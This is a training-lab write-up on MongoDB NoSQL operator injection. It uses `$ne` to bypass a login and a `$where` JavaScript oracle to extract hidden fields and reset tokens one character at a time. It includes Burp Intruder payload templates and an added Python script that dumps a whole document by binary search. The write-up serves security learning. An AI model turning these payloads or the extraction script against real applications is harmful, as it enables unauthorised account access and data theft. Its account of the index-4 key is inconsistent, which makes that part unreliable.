# 04 Lab: Exploiting NoSQL operator injection to extract unknown fields

## Objective

> The user lookup functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection.
>
> To solve the lab, log in as `carlos`.

## Solution

Change the value of the `password` parameter from `invalid` to `{"$ne":"invalid"}` and send the request. Note that you now receive an error message saying 'Account locked'. You cannot access Carlos's account, but this response indicates that the `$ne` operator has been accepted and that the application is vulnerable.

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-edb5ed3fc04759e1af00cf51ca26582d780d796c%2Fimage.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-ea7cdfcfc6e890a675d762cfb32616bf7cb743a9%2Fimage%201.png?alt=media)

Change `"$where": "0"` to `"$where": "1"` and resend the request. Note that you again receive the 'Account locked' error. This indicates that the JavaScript in the `$where` clause is being evaluated against Carlos's document, so its truth value can be used as a one-bit oracle for everything that follows.

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-ee9c3f5e681c753ba4bab06793fcc80967503c09%2Fimage%202.png?alt=media)

Template for reading a key name character by character: `"$where":"Object.keys(this)[1].match('^.{}.*')"`. The number inside the braces is the character offset and the candidate character goes right after them; each offset is swept over the character list shown below.

```jsx
// Expected layout of the user document. Object.keys(this)[N] addresses the N-th key;
// index 3 onwards are the unknown fields whose names we want to recover.
// ("password" is shown with our $ne query value, not the stored one.)
{
  /* pos 0 */ "_id" : 'xxxxxx',
  /* pos 1 */ "username" : "carlos",
  /* pos 2 */ "password" : {"$ne":"invalid"},
  /* pos 3 */ "possible_field" : 'field_value'
}

// Probes to confirm the key at index 1: does its name match 'username'? what length is it?
// Note: `else 0;` is a no-op, so the function returns undefined, which $where treats as false.
"$where":"function(){ if (Object.keys(this)[1].match('username')) return 1; else 0;}"
"$where":"function(){ if (Object.keys(this)[1].length == 6 ) return 1; else 0;}"

// Full login body: the $ne bypass selects the document, the $where probe asks a question about it
{
  "username":"carlos",
  "password":{"$ne":"invalid"},
  "$where": "1"
}
```

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-a6a0dd7a22b5f795be7f6c56b93a33759bbdc1af%2Fimage%203.png?alt=media)

```jsx
// Sweep the length of the key at index 3 (Intruder payload in place of the number)
"$where":"function(){ if (Object.keys(this)[3].length == 6 ) return 1; else 0;}"
// Result: the key at index 3 is 5 characters long
```

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-36e5608d2e67a567f378e3c3c3990ed6425f58b2%2Fimage%204.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-5e96b8d4cfd4c9cead8fd3c0f56627234a0815bc%2Fimage%205.png?alt=media)

```jsx
// Extract the key name one character at a time: $a$ is the Intruder payload position,
// swept over the character list below; repeat for each offset
"$where":"function(){ if (Object.keys(this)[3].match(/^$a$/)) return 1; else 0;}"
// Key at index 3: email
```

```jsx
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
0
1
2
3
4
5
6
7
8
9

```

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-77b91f0207cb1647f0df924806e59e687010e520%2Fimage%206.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-0c21a0a2ff8485cf1c4cfd8f66b04310ed467744%2Fimage%207.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-cba3ae2ce3aa87e8bdf46471fce6908cfa0391fe%2Fimage%208.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-17b885920550e243a8aa6695bfdd42d73af65e0f%2Fimage%209.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-fce5d33b7008af95a8f39e722433cd32a40b7a82%2Fimage%2010.png?alt=media)

***

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-856ee3c242bf76e13849f8ed48409355ebd02d77%2Fimage%2011.png?alt=media)

```jsx
// The hidden field at index 3 is named "email"; now read its value.
// Length sweep on the value (Intruder payload in place of the number): 25 characters
"$where":"function(){ if (this.email.length == 1 ) return 1; else 0;}"
// First character, then offset by offset
"$where":"function(){ if (this.email.match(/^$a$/)) return 1; else 0;}"
// General template: $NUMBER$ = character offset, $CHARACTER$ = candidate character
"$where":"function(){ if (this.email.match('^.{$NUMBER$}$CHARACTER$.*')) return 1; else 0;}"
// Same template with Burp Intruder cluster-bomb markers
"$where":"function(){ if (this.email.match('^.{§1§}§A§.*')) return 1; else 0;}"

// Payload positions: offset 0..24 inside the braces, candidate character right after them
{§§}§§
('^.{§§}§§.*')

// Recovered value:
carlos@carlos-montoya.net

// The next unknown key (index 4) is unlockToken; it is extracted below
```

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-201be0ab5ed1b5d6594ba0e10e14dd81a278f9ae%2Fimage%2012.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-3764e8c3ba32f5ff3cbe3d3efe6edcb0e28a20c3%2Fimage%2013.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-bc4ec6fad9c9b8c02afd276c5ada58955ded352a%2Fimage%2014.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-31816c2d52286fbcb549c838851301a7e0a13f00%2Fimage%2015.png?alt=media)

Another field besides the email

```jsx
// Length sweep for the key at index 4 (Intruder payload in place of §6§)
{"username":"carlos","password":{"$ne":"invalid"},
"$where":"function(){ if (Object.keys(this)[4].length == §6§ ) return 1; else 0;}"
}
// Result: 11 characters

// Character-by-character name extraction at index 4
"$where":"function(){ if (Object.keys(this)[4].match(/^$a$/)) return 1; else 0;}"
// Key name at index 4, and the token stored in it:
unlockToken
9457f5cff38fff0b

// A second probe at index 4 with a fixed 'f' prefix finds a different key; either extend
// the known prefix one character at a time or use the offset/character template
"$where":"function(){ if (Object.keys(this)[4].match(/^f§a§/)) return 1; else 0;}"
"$where":"function(){ if (Object.keys(this)[4].match('^.{§1§}§1§.*')) return 1; else 0;}"
// Key name:
forgotPwd
// Read its value the same way
"$where":"function(){ if (this.forgotPwd.match(/^$a$/)) return 1; else 0;}"
"$where":"function(){ if (this.forgotPwd.match('^.{§1§}§A§.*')) return 1; else 0;}"
// Recovered value:
db10648a240ccfa1
```
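The Intruder sweeps above (key count, key name, then value, one character at a time) can be automated. The script below is an added example and is not part of the original writeup or of the lab; it drives the same `$where` oracle ('Account locked' versus a generic failure) but replaces the `.match()` regex sweep with `.length` and `.charCodeAt(p)` comparisons against a number, so every unknown is recovered by binary search (about 16 requests per character instead of one per candidate). The lab URL passed to `http_oracle`, the document in `FAKE_DOC` and the `simulated_oracle` that answers probes from it are constructed for the offline demo.

```python
"""Blind extraction of a MongoDB document through a $where boolean oracle.
Added example: the probe shapes and the simulated backend are assumptions, not
code from the lab or the original writeup."""
import json
import re
import urllib.error
import urllib.request
from typing import Callable

Oracle = Callable[[str], bool]  # JS expression -> did the server answer 'Account locked'?

# Constructed stand-in for carlos's document; the values are made up for the demo.
FAKE_DOC = {
    "_id": "xxxxxx",
    "username": "carlos",
    "password": "s3cret!",
    "email": "carlos@carlos-montoya.net",
    "unlockToken": "9457f5cff38fff0b",
}


def build_body(js: str, username: str = "carlos") -> str:
    """Login body: $ne bypasses the password check, $where carries the probe."""
    return json.dumps({"username": username, "password": {"$ne": "invalid"}, "$where": js})


def http_oracle(login_url: str) -> Oracle:
    """Real oracle against a lab instance (login_url is a placeholder you supply)."""
    def oracle(js: str) -> bool:
        req = urllib.request.Request(login_url, data=build_body(js).encode(),
                                     headers={"Content-Type": "application/json"})
        try:
            with urllib.request.urlopen(req) as resp:
                text = resp.read().decode()
        except urllib.error.HTTPError as err:  # failed logins come back as HTTP errors
            text = err.read().decode()
        return "Account locked" in text
    return oracle


def simulated_oracle(js: str) -> bool:
    """Offline oracle: evaluates exactly the probe shapes emitted below against FAKE_DOC."""
    keys = list(FAKE_DOC)
    if m := re.fullmatch(r'Object\.keys\(this\)\.length > (\d+)', js):
        return len(keys) > int(m[1])
    if m := re.fullmatch(r'Object\.keys\(this\)\[(\d+)\]\.length > (\d+)', js):
        return len(keys[int(m[1])]) > int(m[2])
    if m := re.fullmatch(r'Object\.keys\(this\)\[(\d+)\]\.charCodeAt\((\d+)\) > (\d+)', js):
        return ord(keys[int(m[1])][int(m[2])]) > int(m[3])
    if m := re.fullmatch(r'this\[("[^"]*")\]\.length > (\d+)', js):
        return len(FAKE_DOC[json.loads(m[1])]) > int(m[2])
    if m := re.fullmatch(r'this\[("[^"]*")\]\.charCodeAt\((\d+)\) > (\d+)', js):
        return ord(FAKE_DOC[json.loads(m[1])][int(m[2])]) > int(m[3])
    raise ValueError("unexpected probe: " + js)


def bsearch(greater_than: Callable[[int], bool], lo: int, hi: int) -> int:
    """Recover the hidden integer s in [lo, hi] from an oracle answering 's > v'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle: Oracle, target: str, max_len: int = 256) -> str:
    """Read the string value of a JS expression such as Object.keys(this)[3] or this["email"].
    Non-string fields (e.g. an ObjectId _id) have no .length and come back empty;
    wrap the target in String(...) if you need them."""
    length = bsearch(lambda v: oracle(f"{target}.length > {v}"), 0, max_len)
    return "".join(
        chr(bsearch(lambda v, p=p: oracle(f"{target}.charCodeAt({p}) > {v}"), 0, 0xFFFF))
        for p in range(length)
    )


def dump_document(oracle: Oracle, max_keys: int = 32) -> dict[str, str]:
    """Enumerate every key of the matched document and read each value."""
    n_keys = bsearch(lambda v: oracle(f"Object.keys(this).length > {v}"), 0, max_keys)
    doc = {}
    for i in range(n_keys):
        key = extract_string(oracle, f"Object.keys(this)[{i}]")
        doc[key] = extract_string(oracle, f"this[{json.dumps(key)}]")
    return doc


if __name__ == "__main__":
    # Against a real instance: dump_document(http_oracle("https://<lab-id>.web-security-academy.net/login"))
    for k, v in dump_document(simulated_oracle).items():
        print(f"{k} = {v}")
```

The `$ne` bypass in `build_body` is what makes every probe run against carlos's document rather than an empty result set; if the lab instance rate-limits or the lock message changes, `http_oracle` is the only piece that needs adjusting.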

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-3271830522849ae3f697afb293da5adbdb70cd39%2Fimage%2016.png?alt=media)

![image.png](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-508a964b9bcf8e011605c5cbc24592f0aac804a2%2Fimage%2017.png?alt=media)

![Untitled](https://1216248185-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FdwRvuHbGnKvUioATlOOa%2Fuploads%2Fgit-blob-2e1215355a779e00cd2a2793558298487b6a5df9%2FUntitled.png?alt=media)
